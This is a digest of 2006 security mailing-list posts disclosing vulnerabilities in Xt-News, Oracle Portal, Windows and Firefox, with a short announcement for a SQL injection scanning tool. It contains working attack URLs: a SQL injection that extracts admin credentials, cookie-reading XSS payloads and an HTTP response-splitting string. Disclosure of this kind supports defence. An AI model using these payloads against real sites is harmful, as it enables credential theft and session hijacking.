Xt-News 0.1 : SQL Injection Vulnerability XSS

2006-12-22 Thread mr_kaliman 
Xt-News 0.1
---
Vendor site: http://dreaxteam.free.fr/forums/
Product: Xt-News 0.1
Vulnerability: SQL Injection Vulnerability  XSS
Credits: Mr_KaLiMaN
Reported to Vendor: 10/12/06
Public disclosure: 22/12/06
 
Description:

SQL Injection Vulnerability:
http://[victim]/[script_news_path]/show_news.php?id_news=[SQL INJECTION]
http://[victim]/[script_news_path]/show_news.php?id_news=-1 UNION SELECT 
id,user,null,null,mdp,null,null,null,null,null,null FROM xtnews_users WHERE 
admin=1#


XSS:
http://[victim]/[script_news_path]/add_comment.php?id_news=[XSS]
http://[victim]/[script_news_path]/add_comment.php?id_news=;scriptalert(document.cookie)/scriptfoo
 
http://[victim]/[script_news_path]/show_news.php?id_news=[XSS]
http://[victim]/[script_news_path]/show_news.php?id_news='scriptalert(document.cookie)/scriptfoo
 '


---

Re: Re: [Full-disclosure] Microsoft Windows XP/2003/Vista memory corruption 0day

2006-12-22 Thread Mike 
Well, Just a warning b4 running the proof of concept... Make sure to close and 
save useful stuff. It indeed works on xp sp2 and it will reboot your machiene. 
I have to say, This would be trick to exploit another programs messagebox, and 
wha joy could you possibly get out of restarting someone computer. I dont think 
there is possiblility for any code execution, as far as I seen. Would be a nice 
S-Kiddy toy if you could do it remotely, but would also piss off alot of people.

RE: [Full-disclosure] Microsoft Windows XP/2003/Vista memory corruption 0day

2006-12-22 Thread Michele Cicciotti 
 Holy mackerel! Instances of this bug date back to 1999!

Different bug. That appears to be a trivial exhaustion of CSRSS worker threads 
through indiscriminate calls to MessageBox+MB_SERVICE_NOTIFICATION, which 
causes a DoS as no threads are available to serve kernel-mode requests from 
win32k, stalling GUI processes. I have done my fair share of CSRSS reversing in 
my better days, and I'm pretty sure that in Windows 2000 and later, a dedicated 
thread is used for such notifications, not just any thread, any time. Easily 
verifiable with local net sends and Spy++. It wasn't a bug either, more like 
a serious design flaw that ignored a very basic Win32 mantra (don't do GUI in 
a worker thread) - not at all like this double-free

rPSA-2006-0234-1 firefox

2006-12-22 Thread rPath Update Announcements 
rPath Security Advisory: 2006-0234-1
Published: 2006-12-22
Products: rPath Linux 1
Rating: Severe
Exposure Level Classification:
Indirect User Deterministic Unauthorized Access
Updated Versions:
firefox=/[EMAIL PROTECTED]:devel//1/1.5.0.9-0.1-1

References:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6497
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6498
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6501
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6502
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6503
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6504
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6505
https://issues.rpath.com/browse/RPL-883

Description:
Previous versions of the firefox package are vulnerable to multiple
types of attacks, including one that enables an attacker to run
arbitrary attacker-provided executable code if JavaScript is enabled.

Oracle Applications/Portal 9i/10g Cross Site Scripting

2006-12-22 Thread putosoft softputo 

Description
---
There are plenty (hundreds) of Cross Site Scripting vulnerabilities in the 
Oracle Portal. The following is one that you may found in any version:


http://target/webapp/jsp/container_tabs.jsp?tc=null%20=%20null;alert('Hello!');window.open('http://www.oracle.com/?fix_security_bugs_now',%20'null');//

The following code will be generated:

---SNIPPED---
script language=javascript
top.null = 
null;alert('Hello!');window.open('http://www.oracle.com/?fix_security_bugs_now', 
'null');//.render(window);

/script
---SNIPPED---

Solution


There is no solution. As a workaround, enable mod_security if it's not. 
Otherwise wait 6 months/1 year for a patch from Oracle Corp.


_
Dale rienda suelta a tu tiempo libre. Mil ideas para exprimir tu ocio con 
MSN Entretenimiento. http://entretenimiento.msn.es/

Re: [Full-disclosure] Oracle Portal 10g HTTP Response Splitting

2006-12-22 Thread putosoft softputo 




From: Brian Eaton [EMAIL PROTECTED]
To: putosoft softputo [EMAIL PROTECTED]
CC: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Oracle Portal 10g HTTP Response Splitting
Date: Wed, 20 Dec 2006 13:55:09 -0500

On 12/20/06, putosoft softputo [EMAIL PROTECTED] wrote:

Oracle Portal/Applications HTTP Response Splitting
--

Sample:

http://target/webapp/jsp/calendar.jsp?enc=iso-8859-1%0d%0aContent-length=12%0d%0a%0d%0a%3Cscript%3Ealert('hi')%3C/script%3E


So they let the URL specify the content-encoding?  They might be
vulnerable to XSS via UTF-7 as well.

Regards,
Brian


Yeah, it is.

_
Moda para esta temporada. Ponte al día de todas las tendencias. 
http://www.msn.es/Mujer/moda/default.asp

SQID v0.2 - SQL Injection Digger.

2006-12-22 Thread contact 
SQL injection digger is a command line program that looks for SQL
injections and common errors in websites.Current version looks for SQL 
injections and common errors in website urls found by performing 
a google search.

The use of google search SOAP API has been removed due to no more issuing of 
keys. Now it directly performs search over the web.

Sqid can be downloaded from http://sqid.rubyforge.org.

--
MSG // http://www.metaeye.org